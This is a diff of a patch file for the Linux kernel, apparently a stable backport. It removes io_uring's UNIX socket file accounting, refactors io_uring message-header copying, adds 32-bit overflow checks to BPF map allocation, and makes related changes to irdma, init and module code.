+diff --git a/include/uapi/rdma/irdma-abi.h b/include/uapi/rdma/irdma-abi.h
+index a7085e092d348..3a0cde4dcf331 100644
+--- a/include/uapi/rdma/irdma-abi.h
++++ b/include/uapi/rdma/irdma-abi.h
+@@ -22,10 +22,15 @@ enum irdma_memreg_type {
+ 	IRDMA_MEMREG_TYPE_CQ   = 2,
+ };
+ 
++enum {
++	IRDMA_ALLOC_UCTX_USE_RAW_ATTR = 1 << 0,
++};
++
+ struct irdma_alloc_ucontext_req {
+ 	__u32 rsvd32;
+ 	__u8 userspace_ver;
+ 	__u8 rsvd8[3];
++	__aligned_u64 comp_mask;
+ };
+ 
+ struct irdma_alloc_ucontext_resp {
+@@ -46,6 +51,7 @@ struct irdma_alloc_ucontext_resp {
+ 	__u16 max_hw_sq_chunk;
+ 	__u8 hw_rev;
+ 	__u8 rsvd2;
++	__aligned_u64 comp_mask;
+ };
+ 
+ struct irdma_alloc_pd_resp {
+diff --git a/init/main.c b/init/main.c
+index 87a52bdb41d67..ccde19e7275fa 100644
+--- a/init/main.c
++++ b/init/main.c
+@@ -89,6 +89,7 @@
+ #include <linux/sched/task_stack.h>
+ #include <linux/context_tracking.h>
+ #include <linux/random.h>
++#include <linux/moduleloader.h>
+ #include <linux/list.h>
+ #include <linux/integrity.h>
+ #include <linux/proc_ns.h>
+@@ -1473,11 +1474,11 @@ static void mark_readonly(void)
+ 	if (rodata_enabled) {
+ 		/*
+ 		 * load_module() results in W+X mappings, which are cleaned
+-		 * up with call_rcu().  Let's make sure that queued work is
++		 * up with init_free_wq. Let's make sure that queued work is
+ 		 * flushed so that we don't hit false positives looking for
+ 		 * insecure pages which are W+X.
+ 		 */
+-		rcu_barrier();
++		flush_module_init_free_work();
+ 		mark_rodata_ro();
+ 		rodata_test();
+ 	} else
+diff --git a/io_uring/filetable.c b/io_uring/filetable.c
+index b80614e7d6051..4660cb89ea9f5 100644
+--- a/io_uring/filetable.c
++++ b/io_uring/filetable.c
+@@ -95,12 +95,10 @@ static int io_install_fixed_file(struct io_ring_ctx *ctx, struct file *file,
+ 		needs_switch = true;
+ 	}
+ 
+-	ret = io_scm_file_account(ctx, file);
+-	if (!ret) {
+-		*io_get_tag_slot(ctx->file_data, slot_index) = 0;
+-		io_fixed_file_set(file_slot, file);
+-		io_file_bitmap_set(&ctx->file_table, slot_index);
+-	}
++	*io_get_tag_slot(ctx->file_data, slot_index) = 0;
++	io_fixed_file_set(file_slot, file);
++	io_file_bitmap_set(&ctx->file_table, slot_index);
++	return 0;
+ err:
+ 	if (needs_switch)
+ 		io_rsrc_node_switch(ctx, ctx->file_data);
+diff --git a/io_uring/io_uring.c b/io_uring/io_uring.c
+index 35894955b4549..415248c1f82c6 100644
+--- a/io_uring/io_uring.c
++++ b/io_uring/io_uring.c
+@@ -60,7 +60,6 @@
+ #include <linux/net.h>
+ #include <net/sock.h>
+ #include <net/af_unix.h>
+-#include <net/scm.h>
+ #include <linux/anon_inodes.h>
+ #include <linux/sched/mm.h>
+ #include <linux/uaccess.h>
+@@ -153,19 +152,6 @@ static void __io_submit_flush_completions(struct io_ring_ctx *ctx);
+ 
+ static struct kmem_cache *req_cachep;
+ 
+-struct sock *io_uring_get_socket(struct file *file)
+-{
+-#if defined(CONFIG_UNIX)
+-	if (io_is_uring_fops(file)) {
+-		struct io_ring_ctx *ctx = file->private_data;
+-
+-		return ctx->ring_sock->sk;
+-	}
+-#endif
+-	return NULL;
+-}
+-EXPORT_SYMBOL(io_uring_get_socket);
+-
+ static inline void io_submit_flush_completions(struct io_ring_ctx *ctx)
+ {
+ 	if (!wq_list_empty(&ctx->submit_state.compl_reqs))
+@@ -2641,12 +2627,6 @@ static __cold void io_ring_ctx_free(struct io_ring_ctx *ctx)
+ 	WARN_ON_ONCE(!list_empty(&ctx->rsrc_ref_list));
+ 	WARN_ON_ONCE(!llist_empty(&ctx->rsrc_put_llist));
+ 
+-#if defined(CONFIG_UNIX)
+-	if (ctx->ring_sock) {
+-		ctx->ring_sock->file = NULL; /* so that iput() is called */
+-		sock_release(ctx->ring_sock);
+-	}
+-#endif
+ 	WARN_ON_ONCE(!list_empty(&ctx->ltimeout_list));
+ 
+ 	if (ctx->mm_account) {
+@@ -3451,32 +3431,12 @@ static int io_uring_install_fd(struct io_ring_ctx *ctx, struct file *file)
+ /*
+  * Allocate an anonymous fd, this is what constitutes the application
+  * visible backing of an io_uring instance. The application mmaps this
+- * fd to gain access to the SQ/CQ ring details. If UNIX sockets are enabled,
+- * we have to tie this fd to a socket for file garbage collection purposes.
++ * fd to gain access to the SQ/CQ ring details.
+  */
+ static struct file *io_uring_get_file(struct io_ring_ctx *ctx)
+ {
+-	struct file *file;
+-#if defined(CONFIG_UNIX)
+-	int ret;
+-
+-	ret = sock_create_kern(&init_net, PF_UNIX, SOCK_RAW, IPPROTO_IP,
+-				&ctx->ring_sock);
+-	if (ret)
+-		return ERR_PTR(ret);
+-#endif
+-
+-	file = anon_inode_getfile_secure("[io_uring]", &io_uring_fops, ctx,
++	return anon_inode_getfile_secure("[io_uring]", &io_uring_fops, ctx,
+ 					 O_RDWR | O_CLOEXEC, NULL);
+-#if defined(CONFIG_UNIX)
+-	if (IS_ERR(file)) {
+-		sock_release(ctx->ring_sock);
+-		ctx->ring_sock = NULL;
+-	} else {
+-		ctx->ring_sock->file = file;
+-	}
+-#endif
+-	return file;
+ }
+ 
+ static __cold int io_uring_create(unsigned entries, struct io_uring_params *p,
+diff --git a/io_uring/io_uring.h b/io_uring/io_uring.h
+index 019600570ee49..59e6f755f12c6 100644
+--- a/io_uring/io_uring.h
++++ b/io_uring/io_uring.h
+@@ -52,7 +52,6 @@ static inline bool io_req_ffs_set(struct io_kiocb *req)
+ }
+ 
+ void __io_req_task_work_add(struct io_kiocb *req, bool allow_local);
+-bool io_is_uring_fops(struct file *file);
+ bool io_alloc_async_data(struct io_kiocb *req);
+ void io_req_task_queue(struct io_kiocb *req);
+ void io_queue_iowq(struct io_kiocb *req, bool *dont_use);
+diff --git a/io_uring/net.c b/io_uring/net.c
+index c062ce66af12c..0d4ee3d738fbf 100644
+--- a/io_uring/net.c
++++ b/io_uring/net.c
+@@ -183,16 +183,115 @@ static int io_setup_async_msg(struct io_kiocb *req,
+ 	return -EAGAIN;
+ }
+ 
++#ifdef CONFIG_COMPAT
++static int io_compat_msg_copy_hdr(struct io_kiocb *req,
++				  struct io_async_msghdr *iomsg,
++				  struct compat_msghdr *msg, int ddir)
++{
++	struct io_sr_msg *sr = io_kiocb_to_cmd(req, struct io_sr_msg);
++	struct compat_iovec __user *uiov;
++	int ret;
++
++	if (copy_from_user(msg, sr->umsg_compat, sizeof(*msg)))
++		return -EFAULT;
++
++	uiov = compat_ptr(msg->msg_iov);
++	if (req->flags & REQ_F_BUFFER_SELECT) {
++		compat_ssize_t clen;
++
++		iomsg->free_iov = NULL;
++		if (msg->msg_iovlen == 0) {
++			sr->len = 0;
++		} else if (msg->msg_iovlen > 1) {
++			return -EINVAL;
++		} else {
++			if (!access_ok(uiov, sizeof(*uiov)))
++				return -EFAULT;
++			if (__get_user(clen, &uiov->iov_len))
++				return -EFAULT;
++			if (clen < 0)
++				return -EINVAL;
++			sr->len = clen;
++		}
++
++		return 0;
++	}
++
++	iomsg->free_iov = iomsg->fast_iov;
++	ret = __import_iovec(ddir, (struct iovec __user *)uiov, msg->msg_iovlen,
++				UIO_FASTIOV, &iomsg->free_iov,
++				&iomsg->msg.msg_iter, true);
++	if (unlikely(ret < 0))
++		return ret;
++
++	return 0;
++}
++#endif
++
++static int io_msg_copy_hdr(struct io_kiocb *req, struct io_async_msghdr *iomsg,
++			   struct user_msghdr *msg, int ddir)
++{
++	struct io_sr_msg *sr = io_kiocb_to_cmd(req, struct io_sr_msg);
++	int ret;
++
++	if (copy_from_user(msg, sr->umsg, sizeof(*sr->umsg)))
++		return -EFAULT;
++
++	if (req->flags & REQ_F_BUFFER_SELECT) {
++		if (msg->msg_iovlen == 0) {
++			sr->len = iomsg->fast_iov[0].iov_len = 0;
++			iomsg->fast_iov[0].iov_base = NULL;
++			iomsg->free_iov = NULL;
++		} else if (msg->msg_iovlen > 1) {
++			return -EINVAL;
++		} else {
++			if (copy_from_user(iomsg->fast_iov, msg->msg_iov,
++					   sizeof(*msg->msg_iov)))
++				return -EFAULT;
++			sr->len = iomsg->fast_iov[0].iov_len;
++			iomsg->free_iov = NULL;
++		}
++
++		return 0;
++	}
++
++	iomsg->free_iov = iomsg->fast_iov;
++	ret = __import_iovec(ddir, msg->msg_iov, msg->msg_iovlen, UIO_FASTIOV,
++				&iomsg->free_iov, &iomsg->msg.msg_iter, false);
++	if (unlikely(ret < 0))
++		return ret;
++
++	return 0;
++}
++
+ static int io_sendmsg_copy_hdr(struct io_kiocb *req,
+ 			       struct io_async_msghdr *iomsg)
+ {
+ 	struct io_sr_msg *sr = io_kiocb_to_cmd(req, struct io_sr_msg);
++	struct user_msghdr msg;
+ 	int ret;
+ 
+ 	iomsg->msg.msg_name = &iomsg->addr;
+-	iomsg->free_iov = iomsg->fast_iov;
+-	ret = sendmsg_copy_msghdr(&iomsg->msg, sr->umsg, sr->msg_flags,
+-					&iomsg->free_iov);
++	iomsg->msg.msg_iter.nr_segs = 0;
++
++#ifdef CONFIG_COMPAT
++	if (unlikely(req->ctx->compat)) {
++		struct compat_msghdr cmsg;
++
++		ret = io_compat_msg_copy_hdr(req, iomsg, &cmsg, ITER_SOURCE);
++		if (unlikely(ret))
++			return ret;
++
++		return __get_compat_msghdr(&iomsg->msg, &cmsg, NULL);
++	}
++#endif
++
++	ret = io_msg_copy_hdr(req, iomsg, &msg, ITER_SOURCE);
++	if (unlikely(ret))
++		return ret;
++
++	ret = __copy_msghdr(&iomsg->msg, &msg, NULL);
++
+ 	/* save msg_control as sys_sendmsg() overwrites it */
+ 	sr->msg_control = iomsg->msg.msg_control_user;
+ 	return ret;
+@@ -415,142 +514,77 @@ int io_send(struct io_kiocb *req, unsigned int issue_flags)
+ 	return IOU_OK;
+ }
+ 
+-static bool io_recvmsg_multishot_overflow(struct io_async_msghdr *iomsg)
++static int io_recvmsg_mshot_prep(struct io_kiocb *req,
++				 struct io_async_msghdr *iomsg,
++				 int namelen, size_t controllen)
+ {
+-	int hdr;
+-
+-	if (iomsg->namelen < 0)
+-		return true;
+-	if (check_add_overflow((int)sizeof(struct io_uring_recvmsg_out),
+-			       iomsg->namelen, &hdr))
+-		return true;
+-	if (check_add_overflow(hdr, (int)iomsg->controllen, &hdr))
+-		return true;
++	if ((req->flags & (REQ_F_APOLL_MULTISHOT|REQ_F_BUFFER_SELECT)) ==
++			  (REQ_F_APOLL_MULTISHOT|REQ_F_BUFFER_SELECT)) {
++		int hdr;
++
++		if (unlikely(namelen < 0))
++			return -EOVERFLOW;
++		if (check_add_overflow(sizeof(struct io_uring_recvmsg_out),
++					namelen, &hdr))
++			return -EOVERFLOW;
++		if (check_add_overflow(hdr, controllen, &hdr))
++			return -EOVERFLOW;
++
++		iomsg->namelen = namelen;
++		iomsg->controllen = controllen;
++		return 0;
++	}
+ 
+-	return false;
++	return 0;
+ }
+ 
+-static int __io_recvmsg_copy_hdr(struct io_kiocb *req,
+-				 struct io_async_msghdr *iomsg)
++static int io_recvmsg_copy_hdr(struct io_kiocb *req,
++			       struct io_async_msghdr *iomsg)
+ {
+-	struct io_sr_msg *sr = io_kiocb_to_cmd(req, struct io_sr_msg);
+ 	struct user_msghdr msg;
+ 	int ret;
+ 
+-	if (copy_from_user(&msg, sr->umsg, sizeof(*sr->umsg)))
+-		return -EFAULT;
+-
+-	ret = __copy_msghdr(&iomsg->msg, &msg, &iomsg->uaddr);
+-	if (ret)
+-		return ret;
+-
+-	if (req->flags & REQ_F_BUFFER_SELECT) {
+-		if (msg.msg_iovlen == 0) {
+-			sr->len = iomsg->fast_iov[0].iov_len = 0;
+-			iomsg->fast_iov[0].iov_base = NULL;
+-			iomsg->free_iov = NULL;
+-		} else if (msg.msg_iovlen > 1) {
+-			return -EINVAL;
+-		} else {
+-			if (copy_from_user(iomsg->fast_iov, msg.msg_iov, sizeof(*msg.msg_iov)))
+-				return -EFAULT;
+-			sr->len = iomsg->fast_iov[0].iov_len;
+-			iomsg->free_iov = NULL;
+-		}
+-
+-		if (req->flags & REQ_F_APOLL_MULTISHOT) {
+-			iomsg->namelen = msg.msg_namelen;
+-			iomsg->controllen = msg.msg_controllen;
+-			if (io_recvmsg_multishot_overflow(iomsg))
+-				return -EOVERFLOW;
+-		}
+-	} else {
+-		iomsg->free_iov = iomsg->fast_iov;
+-		ret = __import_iovec(ITER_DEST, msg.msg_iov, msg.msg_iovlen, UIO_FASTIOV,
+-				     &iomsg->free_iov, &iomsg->msg.msg_iter,
+-				     false);
+-		if (ret > 0)
+-			ret = 0;
+-	}
+-
+-	return ret;
+-}
++	iomsg->msg.msg_name = &iomsg->addr;
++	iomsg->msg.msg_iter.nr_segs = 0;
+ 
+ #ifdef CONFIG_COMPAT
+-static int __io_compat_recvmsg_copy_hdr(struct io_kiocb *req,
+-					struct io_async_msghdr *iomsg)
+-{
+-	struct io_sr_msg *sr = io_kiocb_to_cmd(req, struct io_sr_msg);
+-	struct compat_msghdr msg;
+-	struct compat_iovec __user *uiov;
+-	int ret;
+-
+-	if (copy_from_user(&msg, sr->umsg_compat, sizeof(msg)))
+-		return -EFAULT;
+-
+-	ret = __get_compat_msghdr(&iomsg->msg, &msg, &iomsg->uaddr);
+-	if (ret)
+-		return ret;
++	if (unlikely(req->ctx->compat)) {
++		struct compat_msghdr cmsg;
+ 
+-	uiov = compat_ptr(msg.msg_iov);
+-	if (req->flags & REQ_F_BUFFER_SELECT) {
+-		compat_ssize_t clen;
+-
+-		iomsg->free_iov = NULL;
+-		if (msg.msg_iovlen == 0) {
+-			sr->len = 0;
+-		} else if (msg.msg_iovlen > 1) {
+-			return -EINVAL;
+-		} else {
+-			if (!access_ok(uiov, sizeof(*uiov)))
+-				return -EFAULT;
+-			if (__get_user(clen, &uiov->iov_len))
+-				return -EFAULT;
+-			if (clen < 0)
+-				return -EINVAL;
+-			sr->len = clen;
+-		}
++		ret = io_compat_msg_copy_hdr(req, iomsg, &cmsg, ITER_DEST);
++		if (unlikely(ret))
++			return ret;
+ 
+-		if (req->flags & REQ_F_APOLL_MULTISHOT) {
+-			iomsg->namelen = msg.msg_namelen;
+-			iomsg->controllen = msg.msg_controllen;
+-			if (io_recvmsg_multishot_overflow(iomsg))
+-				return -EOVERFLOW;
+-		}
+-	} else {
+-		iomsg->free_iov = iomsg->fast_iov;
+-		ret = __import_iovec(ITER_DEST, (struct iovec __user *)uiov, msg.msg_iovlen,
+-				   UIO_FASTIOV, &iomsg->free_iov,
+-				   &iomsg->msg.msg_iter, true);
+-		if (ret < 0)
++		ret = __get_compat_msghdr(&iomsg->msg, &cmsg, &iomsg->uaddr);
++		if (unlikely(ret))
+ 			return ret;
+-	}
+ 
+-	return 0;
+-}
++		return io_recvmsg_mshot_prep(req, iomsg, cmsg.msg_namelen,
++						cmsg.msg_controllen);
++	}
+ #endif
+ 
+-static int io_recvmsg_copy_hdr(struct io_kiocb *req,
+-			       struct io_async_msghdr *iomsg)
+-{
+-	iomsg->msg.msg_name = &iomsg->addr;
+-	iomsg->msg.msg_iter.nr_segs = 0;
++	ret = io_msg_copy_hdr(req, iomsg, &msg, ITER_DEST);
++	if (unlikely(ret))
++		return ret;
+ 
+-#ifdef CONFIG_COMPAT
+-	if (req->ctx->compat)
+-		return __io_compat_recvmsg_copy_hdr(req, iomsg);
+-#endif
++	ret = __copy_msghdr(&iomsg->msg, &msg, &iomsg->uaddr);
++	if (unlikely(ret))
++		return ret;
+ 
+-	return __io_recvmsg_copy_hdr(req, iomsg);
++	return io_recvmsg_mshot_prep(req, iomsg, msg.msg_namelen,
++					msg.msg_controllen);
+ }
+ 
+ int io_recvmsg_prep_async(struct io_kiocb *req)
+ {
++	struct io_async_msghdr *iomsg;
+ 	int ret;
+ 
+ 	if (!io_msg_alloc_async_prep(req))
+ 		return -ENOMEM;
+-	ret = io_recvmsg_copy_hdr(req, req->async_data);
++	iomsg = req->async_data;
++	ret = io_recvmsg_copy_hdr(req, iomsg);
+ 	if (!ret)
+ 		req->flags |= REQ_F_NEED_CLEANUP;
+ 	return ret;
+diff --git a/io_uring/rsrc.c b/io_uring/rsrc.c
+index 7ada0339b3870..ac658cfa89c63 100644
+--- a/io_uring/rsrc.c
++++ b/io_uring/rsrc.c
+@@ -494,11 +494,6 @@ static int __io_sqe_files_update(struct io_ring_ctx *ctx,
+ 				err = -EBADF;
+ 				break;
+ 			}
+-			err = io_scm_file_account(ctx, file);
+-			if (err) {
+-				fput(file);
+-				break;
+-			}
+ 			*io_get_tag_slot(data, i) = tag;
+ 			io_fixed_file_set(file_slot, file);
+ 			io_file_bitmap_set(&ctx->file_table, i);
+@@ -762,22 +757,12 @@ void __io_sqe_files_unregister(struct io_ring_ctx *ctx)
+ 	for (i = 0; i < ctx->nr_user_files; i++) {
+ 		struct file *file = io_file_from_index(&ctx->file_table, i);
+ 
+-		/* skip scm accounted files, they'll be freed by ->ring_sock */
+-		if (!file || io_file_need_scm(file))
++		if (!file)
+ 			continue;
+ 		io_file_bitmap_clear(&ctx->file_table, i);
+ 		fput(file);
+ 	}
+ 
+-#if defined(CONFIG_UNIX)
+-	if (ctx->ring_sock) {
+-		struct sock *sock = ctx->ring_sock->sk;
+-		struct sk_buff *skb;
+-
+-		while ((skb = skb_dequeue(&sock->sk_receive_queue)) != NULL)
+-			kfree_skb(skb);
+-	}
+-#endif
+ 	io_free_file_tables(&ctx->file_table);
+ 	io_file_table_set_alloc_range(ctx, 0, 0);
+ 	io_rsrc_data_free(ctx->file_data);
+@@ -805,134 +790,11 @@ int io_sqe_files_unregister(struct io_ring_ctx *ctx)
+ 	return ret;
+ }
+ 
+-/*
+- * Ensure the UNIX gc is aware of our file set, so we are certain that
+- * the io_uring can be safely unregistered on process exit, even if we have
+- * loops in the file referencing. We account only files that can hold other
+- * files because otherwise they can't form a loop and so are not interesting
+- * for GC.
+- */
+-int __io_scm_file_account(struct io_ring_ctx *ctx, struct file *file)
+-{
+-#if defined(CONFIG_UNIX)
+-	struct sock *sk = ctx->ring_sock->sk;
+-	struct sk_buff_head *head = &sk->sk_receive_queue;
+-	struct scm_fp_list *fpl;
+-	struct sk_buff *skb;
+-
+-	if (likely(!io_file_need_scm(file)))
+-		return 0;
+-
+-	/*
+-	 * See if we can merge this file into an existing skb SCM_RIGHTS
+-	 * file set. If there's no room, fall back to allocating a new skb
+-	 * and filling it in.
+-	 */
+-	spin_lock_irq(&head->lock);
+-	skb = skb_peek(head);
+-	if (skb && UNIXCB(skb).fp->count < SCM_MAX_FD)
+-		__skb_unlink(skb, head);
+-	else
+-		skb = NULL;
+-	spin_unlock_irq(&head->lock);
+-
+-	if (!skb) {
+-		fpl = kzalloc(sizeof(*fpl), GFP_KERNEL);
+-		if (!fpl)
+-			return -ENOMEM;
+-
+-		skb = alloc_skb(0, GFP_KERNEL);
+-		if (!skb) {
+-			kfree(fpl);
+-			return -ENOMEM;
+-		}
+-
+-		fpl->user = get_uid(current_user());
+-		fpl->max = SCM_MAX_FD;
+-		fpl->count = 0;
+-
+-		UNIXCB(skb).fp = fpl;
+-		skb->sk = sk;
+-		skb->scm_io_uring = 1;
+-		skb->destructor = unix_destruct_scm;
+-		refcount_add(skb->truesize, &sk->sk_wmem_alloc);
+-	}
+-
+-	fpl = UNIXCB(skb).fp;
+-	fpl->fp[fpl->count++] = get_file(file);
+-	unix_inflight(fpl->user, file);
+-	skb_queue_head(head, skb);
+-	fput(file);
+-#endif
+-	return 0;
+-}
+-
+ static void io_rsrc_file_put(struct io_ring_ctx *ctx, struct io_rsrc_put *prsrc)
+ {
+ 	struct file *file = prsrc->file;
+-#if defined(CONFIG_UNIX)
+-	struct sock *sock = ctx->ring_sock->sk;
+-	struct sk_buff_head list, *head = &sock->sk_receive_queue;
+-	struct sk_buff *skb;
+-	int i;
+-
+-	if (!io_file_need_scm(file)) {
+-		fput(file);
+-		return;
+-	}
+-
+-	__skb_queue_head_init(&list);
+-
+-	/*
+-	 * Find the skb that holds this file in its SCM_RIGHTS. When found,
+-	 * remove this entry and rearrange the file array.
+-	 */
+-	skb = skb_dequeue(head);
+-	while (skb) {
+-		struct scm_fp_list *fp;
+ 
+-		fp = UNIXCB(skb).fp;
+-		for (i = 0; i < fp->count; i++) {
+-			int left;
+-
+-			if (fp->fp[i] != file)
+-				continue;
+-
+-			unix_notinflight(fp->user, fp->fp[i]);
+-			left = fp->count - 1 - i;
+-			if (left) {
+-				memmove(&fp->fp[i], &fp->fp[i + 1],
+-						left * sizeof(struct file *));
+-			}
+-			fp->count--;
+-			if (!fp->count) {
+-				kfree_skb(skb);
+-				skb = NULL;
+-			} else {
+-				__skb_queue_tail(&list, skb);
+-			}
+-			fput(file);
+-			file = NULL;
+-			break;
+-		}
+-
+-		if (!file)
+-			break;
+-
+-		__skb_queue_tail(&list, skb);
+-
+-		skb = skb_dequeue(head);
+-	}
+-
+-	if (skb_peek(&list)) {
+-		spin_lock_irq(&head->lock);
+-		while ((skb = __skb_dequeue(&list)) != NULL)
+-			__skb_queue_tail(head, skb);
+-		spin_unlock_irq(&head->lock);
+-	}
+-#else
+ 	fput(file);
+-#endif
+ }
+ 
+ int io_sqe_files_register(struct io_ring_ctx *ctx, void __user *arg,
+@@ -986,21 +848,12 @@ int io_sqe_files_register(struct io_ring_ctx *ctx, void __user *arg,
+ 			goto fail;
+ 
+ 		/*
+-		 * Don't allow io_uring instances to be registered. If UNIX
+-		 * isn't enabled, then this causes a reference cycle and this
+-		 * instance can never get freed. If UNIX is enabled we'll
+-		 * handle it just fine, but there's still no point in allowing
+-		 * a ring fd as it doesn't support regular read/write anyway.
++		 * Don't allow io_uring instances to be registered.
+ 		 */
+ 		if (io_is_uring_fops(file)) {
+ 			fput(file);
+ 			goto fail;
+ 		}
+-		ret = io_scm_file_account(ctx, file);
+-		if (ret) {
+-			fput(file);
+-			goto fail;
+-		}
+ 		file_slot = io_fixed_file_slot(&ctx->file_table, i);
+ 		io_fixed_file_set(file_slot, file);
+ 		io_file_bitmap_set(&ctx->file_table, i);
+diff --git a/io_uring/rsrc.h b/io_uring/rsrc.h
+index acaf8dad05401..85f145607c620 100644
+--- a/io_uring/rsrc.h
++++ b/io_uring/rsrc.h
+@@ -77,21 +77,6 @@ int io_sqe_files_unregister(struct io_ring_ctx *ctx);
+ int io_sqe_files_register(struct io_ring_ctx *ctx, void __user *arg,
+ 			  unsigned nr_args, u64 __user *tags);
+ 
+-int __io_scm_file_account(struct io_ring_ctx *ctx, struct file *file);
+-
+-static inline bool io_file_need_scm(struct file *filp)
+-{
+-	return false;
+-}
+-
+-static inline int io_scm_file_account(struct io_ring_ctx *ctx,
+-				      struct file *file)
+-{
+-	if (likely(!io_file_need_scm(file)))
+-		return 0;
+-	return __io_scm_file_account(ctx, file);
+-}
+-
+ int io_register_files_update(struct io_ring_ctx *ctx, void __user *arg,
+ 			     unsigned nr_args);
+ int io_register_rsrc_update(struct io_ring_ctx *ctx, void __user *arg,
+diff --git a/kernel/bpf/core.c b/kernel/bpf/core.c
+index 76bf1de261152..44abf88e1bb0d 100644
+--- a/kernel/bpf/core.c
++++ b/kernel/bpf/core.c
+@@ -857,7 +857,12 @@ static LIST_HEAD(pack_list);
+  * CONFIG_MMU=n. Use PAGE_SIZE in these cases.
+  */
+ #ifdef PMD_SIZE
+-#define BPF_PROG_PACK_SIZE (PMD_SIZE * num_possible_nodes())
++/* PMD_SIZE is really big for some archs. It doesn't make sense to
++ * reserve too much memory in one allocation. Hardcode BPF_PROG_PACK_SIZE to
++ * 2MiB * num_possible_nodes(). On most architectures PMD_SIZE will be
++ * greater than or equal to 2MB.
++ */
++#define BPF_PROG_PACK_SIZE (SZ_2M * num_possible_nodes())
+ #else
+ #define BPF_PROG_PACK_SIZE PAGE_SIZE
+ #endif
+diff --git a/kernel/bpf/cpumap.c b/kernel/bpf/cpumap.c
+index 0508937048137..806a7c1b364b6 100644
+--- a/kernel/bpf/cpumap.c
++++ b/kernel/bpf/cpumap.c
+@@ -306,6 +306,7 @@ static int cpu_map_bpf_prog_run(struct bpf_cpu_map_entry *rcpu, void **frames,
+ static int cpu_map_kthread_run(void *data)
+ {
+ 	struct bpf_cpu_map_entry *rcpu = data;
++	unsigned long last_qs = jiffies;
+ 
+ 	complete(&rcpu->kthread_running);
+ 	set_current_state(TASK_INTERRUPTIBLE);
+@@ -331,10 +332,12 @@ static int cpu_map_kthread_run(void *data)
+ 			if (__ptr_ring_empty(rcpu->queue)) {
+ 				schedule();
+ 				sched = 1;
++				last_qs = jiffies;
+ 			} else {
+ 				__set_current_state(TASK_RUNNING);
+ 			}
+ 		} else {
++			rcu_softirq_qs_periodic(last_qs);
+ 			sched = cond_resched();
+ 		}
+ 
+diff --git a/kernel/bpf/devmap.c b/kernel/bpf/devmap.c
+index f9a87dcc5535b..e051cbb07dac0 100644
+--- a/kernel/bpf/devmap.c
++++ b/kernel/bpf/devmap.c
+@@ -131,13 +131,14 @@ static int dev_map_init_map(struct bpf_dtab *dtab, union bpf_attr *attr)
+ 	bpf_map_init_from_attr(&dtab->map, attr);
+ 
+ 	if (attr->map_type == BPF_MAP_TYPE_DEVMAP_HASH) {
+-		dtab->n_buckets = roundup_pow_of_two(dtab->map.max_entries);
+-
+-		if (!dtab->n_buckets) /* Overflow check */
++		/* hash table size must be power of 2; roundup_pow_of_two() can
++		 * overflow into UB on 32-bit arches, so check that first
++		 */
++		if (dtab->map.max_entries > 1UL << 31)
+ 			return -EINVAL;
+-	}
+ 
+-	if (attr->map_type == BPF_MAP_TYPE_DEVMAP_HASH) {
++		dtab->n_buckets = roundup_pow_of_two(dtab->map.max_entries);
++
+ 		dtab->dev_index_head = dev_map_create_hash(dtab->n_buckets,
+ 							   dtab->map.numa_node);
+ 		if (!dtab->dev_index_head)
+diff --git a/kernel/bpf/hashtab.c b/kernel/bpf/hashtab.c
+index 88c71de0a0a95..0c74cc9012d5c 100644
+--- a/kernel/bpf/hashtab.c
++++ b/kernel/bpf/hashtab.c
+@@ -495,7 +495,13 @@ static struct bpf_map *htab_map_alloc(union bpf_attr *attr)
+ 							  num_possible_cpus());
+ 	}
+ 
+-	/* hash table size must be power of 2 */
++	/* hash table size must be power of 2; roundup_pow_of_two() can overflow
++	 * into UB on 32-bit arches, so check that first
++	 */
++	err = -E2BIG;
++	if (htab->map.max_entries > 1UL << 31)
++		goto free_htab;
++
+ 	htab->n_buckets = roundup_pow_of_two(htab->map.max_entries);
+ 
+ 	htab->elem_size = sizeof(struct htab_elem) +
+@@ -505,10 +511,8 @@ static struct bpf_map *htab_map_alloc(union bpf_attr *attr)
+ 	else
+ 		htab->elem_size += round_up(htab->map.value_size, 8);
+ 
+-	err = -E2BIG;
+-	/* prevent zero size kmalloc and check for u32 overflow */
+-	if (htab->n_buckets == 0 ||
+-	    htab->n_buckets > U32_MAX / sizeof(struct bucket))
++	/* check for u32 overflow */
++	if (htab->n_buckets > U32_MAX / sizeof(struct bucket))
+ 		goto free_htab;
+ 
+ 	err = -ENOMEM;
+diff --git a/kernel/bpf/helpers.c b/kernel/bpf/helpers.c
+index 83f8f67e933df..758510b46d87b 100644
+--- a/kernel/bpf/helpers.c
++++ b/kernel/bpf/helpers.c
+@@ -328,7 +328,7 @@ static inline void __bpf_spin_lock_irqsave(struct bpf_spin_lock *lock)
+ 	__this_cpu_write(irqsave_flags, flags);
+ }
+ 
+-notrace BPF_CALL_1(bpf_spin_lock, struct bpf_spin_lock *, lock)
++NOTRACE_BPF_CALL_1(bpf_spin_lock, struct bpf_spin_lock *, lock)
+ {
+ 	__bpf_spin_lock_irqsave(lock);
+ 	return 0;
+@@ -350,7 +350,7 @@ static inline void __bpf_spin_unlock_irqrestore(struct bpf_spin_lock *lock)
+ 	local_irq_restore(flags);
+ }
+ 
+-notrace BPF_CALL_1(bpf_spin_unlock, struct bpf_spin_lock *, lock)
++NOTRACE_BPF_CALL_1(bpf_spin_unlock, struct bpf_spin_lock *, lock)
+ {
+ 	__bpf_spin_unlock_irqrestore(lock);
+ 	return 0;
+diff --git a/kernel/bpf/stackmap.c b/kernel/bpf/stackmap.c
+index f86db3cf72123..f0fd936cef319 100644
+--- a/kernel/bpf/stackmap.c
++++ b/kernel/bpf/stackmap.c
+@@ -94,11 +94,14 @@ static struct bpf_map *stack_map_alloc(union bpf_attr *attr)
+ 	} else if (value_size / 8 > sysctl_perf_event_max_stack)
+ 		return ERR_PTR(-EINVAL);
+ 
+-	/* hash table size must be power of 2 */
+-	n_buckets = roundup_pow_of_two(attr->max_entries);
+-	if (!n_buckets)
++	/* hash table size must be power of 2; roundup_pow_of_two() can overflow
++	 * into UB on 32-bit arches, so check that first
++	 */
++	if (attr->max_entries > 1UL << 31)
+ 		return ERR_PTR(-E2BIG);
+ 
++	n_buckets = roundup_pow_of_two(attr->max_entries);
++
+ 	cost = n_buckets * sizeof(struct stack_map_bucket *) + sizeof(*smap);
+ 	smap = bpf_map_area_alloc(cost, bpf_map_attr_numa_node(attr));
+ 	if (!smap)
+diff --git a/kernel/module/main.c b/kernel/module/main.c
+index 7a376e26de85b..554aba47ab689 100644
+--- a/kernel/module/main.c
++++ b/kernel/module/main.c
+@@ -2434,6 +2434,11 @@ static void do_free_init(struct work_struct *w)
+ 	}
+ }
+ 
++void flush_module_init_free_work(void)
++{
++	flush_work(&init_free_wq);
++}
++
+ #undef MODULE_PARAM_PREFIX
+ #define MODULE_PARAM_PREFIX "module."
+ /* Default value for module->async_probe_requested */
